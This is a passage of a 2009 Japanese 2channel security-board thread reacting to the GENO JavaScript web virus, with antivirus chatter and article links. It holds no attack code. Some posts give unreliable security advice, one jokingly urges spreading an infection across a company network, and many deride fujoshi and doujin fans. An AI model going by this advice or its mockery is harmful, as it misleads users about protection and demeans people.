とも思ったが向こう見てると確かにひどいwwww
バカ多すぐるwwwwwwwww
だから大流行してんだろうな、同人サイトでwwwwwwwwww

123 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:42:33 ]
俺がGENOだあああああああ!!!!!

124 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:42:43 ]
>>●365日、毎日9:00〜24:00まで対応!
(#`ハ´)答えは全て「サイインストールスル アル」

>>●パソコン、メール、周辺機器などの面倒な設定、変更をサポート!
(#`ハ´)VB不具合無いアル、不具合周辺機器せいアル。周辺機器メーカーへ問い合わせるアル

>>●パソコン、メール、インターネット関連のトラブルに対応!
(#`ハ´)VB不具合無いアル、お使いのパソコンメーカー、プロバイダーに問い合わせるアル

>>●パソコン、アプリケーション、周辺機器など基本的な操作方法をサポート!
(#`ハ´)VB不具合無いアルから、お使いのパソコンメーカーに問い合わせるアル

>>●ハードウェアの故障の場合は、トラブルを切り分けし、メーカサポートをご案内
(#`ハ´)切り分ける能力無いアル。VB不具合全部ハードのせいアルネ

>>●電話でわからない場合は、リモート(遠隔操作)で対応も!!で解決!!
(#`ハ´)msconfigでスタートアップ・サービス全止め→再起動、なおらなければサイインストール アル

125 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:43:06 ]
>>122
同人サイトがウイルスばらまいてるんだよな
あいつらがいなくなれば無くなりそうww

126 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:43:22 ]
たった1日スレ見なかった間になんでこんなに伸びてるの?

127 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:43:31 ]
Meの場合はどうやって感染確認するのでしょうか

128 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:43:35 ]
>>125
とっととサイト消せばいい話なんだけどな

129 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:43:38 ]
亜種っていっても基本的な感染経路や動作が同じなら対策は変わらないんで、
スレが脱線するのもやむをえない。

130 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:43:51 ]
>>119
lt;丶`∀´gt; PeerGuardian2 ★ 4 (`ハ´ )
pc11.2ch.net/test/read.cgi/sec/1228949365/



131 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:43:55 ]
>>118
adobeの穴を閉めとかないとな

132 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:44:01 ]
>>126
腐女子に荒らされた

133 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:44:10 ]

セキュリティスレに見せ掛けたオタ叩きスレ?

134 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:44:33 ]
>>129
だよな。

135 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:44:37 ]
>>126
トレンドマイクロいよいよピンチ

136 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:44:44 ]
>>133
腐女子が散々荒らした残骸がこのスレです

137 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:45:42 ]
>>133
違うよ
あいつらが今回のウイルスの原因だから


138 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:45:46 ]
ゾイド板から

139 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:45:48 ]
>>133
腐女子たたきスレですw
実質同人板の方が機能してる

140 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:45:53 ]
このスレで今一番HOTな対策ソフトって何?



141 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:46:21 ]
>>140
ノートン先生です

142 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:46:35 ]
>>140
CAかな

143 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:46:37 ]
>>140
ウイルスバスター


144 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:46:50 ]
>>136
軌道修正しねえの?

145 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:46:52 ]
>>109
IDが出ないから頭のアレな子達が大はしゃぎ

146 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:46:54 ]
セキュ板総受けの同人誌出すわ

147 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:47:00 ]
とりあえず余計なサイトみなきゃいいと思ってたけど
一般のサイトもやられてるわけで…


148 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:47:14 ]
>>140
ノートン先生ですけど、現在休暇中です

149 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:47:49 ]
ものすごい自演臭いスレですね。

150 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:47:56 ]
>>147
つ携帯



151 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:48:25 ]
>>147
同人の奴らが馬鹿なだけで
他のサイトは大丈夫でしょ

152 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:48:28 ]
バカス臭いな

153 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:48:30 ]
でかいサイトがやられたら日本沈没する

154 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:48:31 ]
GENOウイルス×ノートン先生

155 名前:126 mailto:sage [2009/05/16(土) 21:48:38 ]
>>132
なるほど、同人系のサイトが感染喰らって慌ててたってところか…
今更な気がするけど

>>135
バスターも何かやらかしたのか…

156 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:48:56 ]
>>150
linux使えよ。
おまえら、linuxは腐女子の基本にしろ
そんくらい使いこなせないで、腐女子なのるな
風下だぜ

157 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:48:58 ]
googleの検索結果をいじるって面白いな
他の検索エンジンの結果は通常なんだろうか

158 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:49:10 ]
GENOのニュースとか日本国外の感染状況はどうなっている?

159 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:49:16 ]
2chだけPCで見て、一般サイトは携帯で見てるわ

160 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:49:23 ]
>>150
画面小さくてな…
まあ沈静化するまでは最低限そうするわ



161 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:49:29 ]
>>140
Linux

162 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:50:01 ]
>>153
いやM$が崩壊するだけさ。
linuxが世界を席巻する

163 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:50:07 ]
早く対策されて普通に駆除できるようにならんものかなぁ

164 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:50:07 ]
新たな「Webウイルス」が猛威、感染被害が急増:ITpro
itpro.nikkeibp.co.jp/article/NEWS/20090515/330053/

同社が「JSRedir-R」と命名したもの。
実体はJavaScriptで書かれたプログラム(図1)。
多くの場合、攻撃者は何らかの方法で正規サイトに不正アクセスし、
このウイルスをWebページに埋め込む。
そのページにユーザーがアクセスすると、埋め込まれたウイルスが動き出し、
別のウイルスを勝手にインストールされる恐れなどがある。

これ、GENOウィルス?

165 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:50:21 ]
もしもヤフーやグーグルがやられたらどうなってしまうだろうか

166 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:50:31 ]
>>155
同人だけ異様に発見されてるww

167 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:50:44 ]
ウィルスセキュリティは、大丈夫ですか?

168 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:51:08 ]
>>164
それだ

169 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:51:11 ]
>>165
googleは一時期感染報告あったが多分デマ

170 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:51:21 ]
よくわかんないけどホモサイトにいかなきゃいいんだろ



171 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:51:33 ]
avastがプッシュされてるのはほかのに比べてよく検知出来てるから?

172 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:51:37 ]
>>165
グーグルでも感染例が報告済み

173 名前:140 mailto:sage [2009/05/16(土) 21:51:37 ]
ノートン先生は対策してるのか?

174 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:51:54 ]
>>169
googleの検索結果改竄とごっちゃになってただけだと思う。

175 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:52:01 ]
>>169
多分検索先読みの話がごっちゃになってたんだろな

176 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:52:10 ]
>>173
ノートンはおねんねタイムだよ

177 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 21:52:26 ]
>>170 住人だけど、大丈夫だよ。

178 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:52:30 ]
過去スレ読めよ

179 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:52:30 ]
>>164
俺ら大勝利wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww


180 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:52:33 ]
>>173
俺の隣で寝てるから安心汁



181 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:52:50 ]
>>171
貧乏人が多いスレだから



182 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:53:07 ]
ニコニコの覗き見検索とやらは?

183 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:53:12 ]
ノートン先生は月曜にならないと起きませんw

184 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:53:32 ]
pc11.2ch.net/test/read.cgi/sec/1242125567/
答えは全てここにある!

185 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:53:34 ]
>>170
公式サイトでも感染してるくらいのウィルスですよ。
同人サイトも見に行かないほうがいいですが、他にも気をつけましょう。

186 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:53:35 ]
>>163
>>165
だから、Linux使ってれば関係ないってば。
他の惑星系のインフレくらい影響がない。

187 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:53:47 ]
>>171
このウィルスに対して反応が早かった

188 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:53:48 ]
>>170
ホモというかアニメとかオタク系は全滅みたいだよ


189 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:54:28 ]
>>170
へたなんとかってのが公式感染しててやばいみたいよ
メシウマですけどね

190 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:54:30 ]
>>173
一緒にお風呂に入ってるよ



191 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:54:41 ]
macのbootcamp使いも危ねえのかなーこれは

192 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:55:12 ]
狐かoperaでおk?


193 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:55:13 ]
>>173
今アップ中
月曜日まで待ってろってばっちゃが言ってた

194 名前:127 mailto:sage [2009/05/16(土) 21:55:32 ]
誰か教えてくだしあ…

195 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:55:48 ]
ttp://shop.trendmicro.co.jp/vb_ms_sp2
ttp://shop.trendmicro.co.jp/store/trendjp/ja_JP/DisplayMSPage
これは?

196 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:55:48 ]
>>194
ググれ

197 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:55:54 ]
>>164
図1 「JSRedir-R」の一部(ソフォスの情報から引用)。
同ウイルスの実体は、JavaScriptで記述されたプログラム。
難読化された状態でWebページに埋め込まれる

itpro.nikkeibp.co.jp/article/NEWS/20090515/330053/?SS=imgview&FD=-654642772&ST=securityhole

198 名前:171 mailto:sage [2009/05/16(土) 21:56:11 ]
>>187
なるほどThx

199 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:56:48 ]
ベホマ

200 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:56:49 ]
ウィルスセキュリティZEROは?



201 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:56:55 ]
>>188
そういうレベルの問題じゃないよ

202 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:57:17 ]
>>199
キアリーだろ

203 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:57:29 ]
>>200
さようなら

204 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:57:35 ]
次スレたったのか

205 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:57:41 ]
>>199
あえてぱふぱふ

206 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:57:41 ]
>>200
先生以外のソフトならおk!


207 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:57:49 ]
>>194
avast入れればおk
対応してるかは知らないけど

208 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:58:02 ]
ヒットエンドラーン

209 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:58:11 ]
>>201
いや、同人関係がほとんどなんだが

210 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:58:13 ]
キアリクだろ



211 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:58:20 ]
>>200
インドに帰れよ

212 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:59:00 ]
>>200

何それ

213 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:59:23 ]
同人同人いってるが
それ含めウェブサイトがやべーっていってんだろ

214 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:59:27 ]
>>200
K7って書いてくれないと通じないんだけど?

215 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:59:59 ]
>>209
別に同人関係だけで出回ってるウイルスじゃないから

216 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:00:06 ]
こういう時いつも思うんだが先生っていつ仕事してんのかな

217 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:00:16 ]
「ウイルス対策ソフトでるから余裕w」と思ってそのまま放置とかありえそうで怖い

218 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:00:28 ]
なんか同人関係を叩けば安心しちゃう変な子がいるな

219 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:00:35 ]
>>197
itpro.nikkeibp.co.jp/article/NEWS/20090515/330053/ph1.jpg
www.dotup.org/uploda/www.dotup.org34101.jpg

うお これは感染してるページなん

220 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:00:39 ]
>>164
やっと来たか…
しかしこれsophosが言ってるのを載せただけだし
日本国内のサイトがいかにやばい状態になってるかはこれじゃわからないだろうな



221 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:00:43 ]
検体が欲しいのでだれか感染したサイトのURLplz

222 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:00:57 ]
>>216
俺らが寝てるときこっそり仕事してるよ

223 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:01:46 ]
>>216
ノートン先生の本業はPCを重くすることだぞ

224 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:01:48 ]
俺の他愛ない喧嘩してんの?っていう言葉で
両親が本当に険悪な雰囲気になってしまった
これもウィルスのせい?

225 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:01:52 ]
ここに書かれてる対策して、あとは月曜まで携帯でネッサ
これでおk

226 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:01:53 ]
K7は、大丈夫なんでしょうか?

227 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:02:08 ]
検体スレいけ

228 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 22:02:37 ]
ペストバトロールはどうですか?

229 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:02:43 ]
先生ありがとう・・・ 先生のことは忘れません・・・

230 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:02:46 ]
>>226
インドへお帰りください



231 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:02:51 ]
>>23
変わったって何で分かったの?

232 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:03:05 ]
ノートン先生にはがんばってほしい

233 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:03:21 ]
遊んでるバカが職場のPCでやらかしそうで怖い

234 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:03:33 ]
>>224
主に祭り厨のせい
あいつらはとにかくスレで騒いでテンション上げることだけが目的でウイルスとかどうなってもいいんだろ

235 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:04:00 ]
>>226
だから先生以外は大丈夫ってさっきから書いてるだろ


236 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:04:27 ]
先生は、いつ仕事しているんですか?

237 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:04:29 ]
へんなjavaスクが書いてあるページをjavaスクonにしてブラウザで表示させたらヤバいってことなら、
WWWCでアイコンを右クリック→ソースの表示
 (例えばです。他にも一杯やりかたあるんだろうけど。)
で、ソースに変なコードがあるかどうか見てみればいいんじゃないの?

238 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:05:00 ]
>>164
同一なら、世界でも猛威を振るっていると言うことか・・・。

239 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:05:03 ]
>>226
そんなフリーソフトはダメに決まってるだろボケ

240 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:05:22 ]
>>237
そんな作業が普通にできる奴なら最初から問題ないんじゃね



241 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:05:31 ]
感染してる奴って自分のサイトみて気付かないわけ?

242 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:06:02 ]
ゼロとキングソフトは論外

243 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:06:05 ]
同人サイトから責任を逸らそうとするのが多いなww
ここ最近発見されてるのは同人だけだが…?

244 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:06:10 ]
>>237
その通り。それである程度防げる
で、お前はその作業をページが移るたびにやるつもりか?

245 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:06:23 ]
>>241
うんこくさいのにうんこついてない
つまりそういうこと

246 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:07:04 ]
カスペなら安心ですか?

247 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:07:06 ]
パスMyPicturesまたはボリュームが無効です。

削除できない

248 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:07:07 ]
>>241
同人スレ行ってみな何も分かってないよ

249 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:07:33 ]
itpro.nikkeibp.co.jp/article/NEWS/20090514/330029/
慌てた同人のやつらとかひっかかりそうだな

250 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:07:41 ]
スレ伸び加速しすぎw



251 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:07:47 ]
ああ、同人サイトって同人誌無断でアップしてるサイトじゃなくて作ってる方の連中が引っ掛かってるのか
なんか思いっきり勘違いしてた

252 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:07:48 ]
>>241
このウイルスは人を脅かすのが目的ではなく
こっそり各種情報を抜き取るのが目的なんで
感染しているかどうかはできるだけ見た目で判断できないように工夫している

騒ぎの初期には「cmd.exeが起動すれば安心!」みたいなお手軽判定法があったが、
とっくに対策された亜種が出回ってるようだ。

253 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:08:05 ]
>>245
じゃあ感染者がソースみてもなんも書いてないけど周りはソース改竄されてるのは見えるわけ?

254 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:08:29 ]
>>23
これほんとなの?
どこ情報?

255 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:08:44 ]
先生はパルスアップデートで何をアップデートしてるんだよ・・・

256 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:09:10 ]
>>243
なんでそんなに同人界隈と闘いたがるの?
ウイルス問題を摩り替えてない?

257 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:09:17 ]
>>255
あんなの自己満に過ぎないさ

258 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:09:39 ]
マジな話だけどIE7,8の「InPrivate」使えば大丈夫じゃね?


259 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:09:51 ]
>>255
ファイルの日付

260 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:10:17 ]
>>244
うん。
いっつも行くサイトの更新チェックだけでもしたかったから。
でもよく考えたら、あらゆるページをそやって確認するのなんか、
確かにめんどくさ過ぎるわな。



261 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:10:30 ]
>>258
おまえ感染してるよ
お疲れさん

262 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:10:32 ]
>>258
大丈夫かどうか試してみ

263 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:10:40 ]
検体スレってどこ?

264 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:11:11 ]
WindowsUpdateが重いが
この件で殺到してるのだろうか

265 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:11:24 ]
バタリアン並みの感染スピードw

266 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:11:41 ]
腐とボカロと東方死亡∩(・ω・)∩バジャーイ

267 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:11:41 ]
>>259
ご丁寧に時間まで更新してるらしいな

268 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:12:13 ]
>>266
害悪ジャンル壊滅かざまあ

269 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:12:15 ]
>>264
ソンビ化したPCがDDoSやってるのかも

270 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:12:30 ]
捨てようと思ったのにエラーになるわ



271 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:12:31 ]
ノートンのファン回りっぱなし状態はどうにかならないの?

272 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:12:31 ]
>>265

ゾンビのくせに走るのは画期的だったな。

273 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:12:51 ]
>>267
先生ちゃんと仕事してるじゃん

274 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:13:05 ]
せんせいは やればできるこ

275 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:13:06 ]
リカバリディスクが見つからなくてクリーンインストールできない、けれど仕事でPCを
使わざるを得ない場合はどうするのがいいんでしょうか。

276 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:13:17 ]
>>261
opera使いの俺には関係ない話だ


277 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:13:18 ]
>>263
【鑑定目的禁止】検出可否報告スレ10
pc11.2ch.net/test/read.cgi/sec/1235459712/

これかな?

278 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:13:30 ]
>>275
仕事を辞める

279 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:13:32 ]
>>266
(* >ω<)=3プー
そこらへんは全部いらないな

280 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:14:06 ]
>>209
それはお前が見てるサイトだけだろ
ほかにもある



281 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:14:18 ]
腐女子寝ないの?w

282 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:14:57 ]
>>280
もう触るなよ

283 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:15:07 ]
>>275
取扱説明書に内部リカバリ手順が載ってるならそれで
駄目ならそのまま繋いで会社全体にウイルスばら撒いて責任問題に発展させる
自殺するなよ

284 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:15:12 ]
小林製薬はCM流す暇合ったら注意喚起しろよ

285 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:15:31 ]
CA使ってる自分は負け組

286 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:15:46 ]
同人で大事になってるのは
子供や情弱がちゃんとわかってる人に話しかけられる環境があるからだよ。
普通のコミュニティでは子供は子供、情弱は情弱でまとまってるからそのまま気づかない。

287 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:16:03 ]
>>277
難しくてよくわからねえ・・・ ありがとう

288 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:16:03 ]
>>275
正直に上司に相談しろ 絶対会社のネットワークに繋ぐな

289 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:16:07 ]
>>279
709 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/04/10(金) 00:13:27
ニコ動で動画再生するとCPU使用率が
50前後ぐらいいくんだけど元々、そんなもんかねぇ

コレお前?

290 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:16:10 ]
仮想化してれば平気?



291 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:16:31 ]
>>285
ペンタゴンの人?

292 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:17:02 ]
ネットサーフィンしてたらAVASTが警告出してきたのですぐ閉じた
感染したかと思い再起動してからウィルスチェックしたら何も無し
普通に信用して開いてたら死んでたわ

293 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:17:12 ]
スレから離れられなくて、うんこ漏れそう

294 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:17:27 ]
>>289
それどこのスレの奴だよw

295 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:17:31 ]
>>286
ああ、それっぽいな
普通なら感染も防げるし、
もしなっても自分で調べればわかるかな

296 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:17:31 ]
>>293
ノートン先生で解決だ

297 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:17:50 ]
XPで管理者権限でネットやってる馬鹿が多いって笑えるね

制限者でネット繋げばウイルスソフトも要らないのにwww


298 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:17:59 ]
もしニコニコとかが感染したら一気に広がりそうだなこれ

299 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:18:29 ]
>>297
ウイルスソフトなんていらねえよww

300 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:18:45 ]
まだ腐ヲチ・同人ヲチしてるやつはなんなの?自分が荒らしてることに気づかないの?



301 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:18:45 ]
>>298
とっくにやられてたわけだが

302 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:18:47 ]
513 名前:geno[sage] 投稿日:2009/05/16(土) 21:56:55 ID:GQnaax2E0
痛ニュとかの有名どころのコピペブログ感染してるな
ライブドアもか

303 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:18:50 ]
>>296
垂れ流しちゃえ

304 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:19:07 ]
>>296
先生万能すぐる

305 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:19:14 ]
>>299
恒例の流れになってんなw

306 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:19:44 ]
>283
内部リカバリーの存在をすっかり忘れていました!
マジで感謝です。

これってパーティションで区切ってあるDドライブの方はそのままでも大丈夫ですか?

307 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:19:47 ]
サイトにウィルスコードを埋め込むってウィルスから取得したパスワードとかの
情報を使って第三者が改ざんするってこと?

308 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:19:48 ]
ウイルスソフトって何?
バスターのことかい?

309 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:19:58 ]
>>301
やられてたのはsaymoveの覗き見検索じゃないのか?
ニコニコ自体がやられてたら、それはそれでおもしろそうなんだが

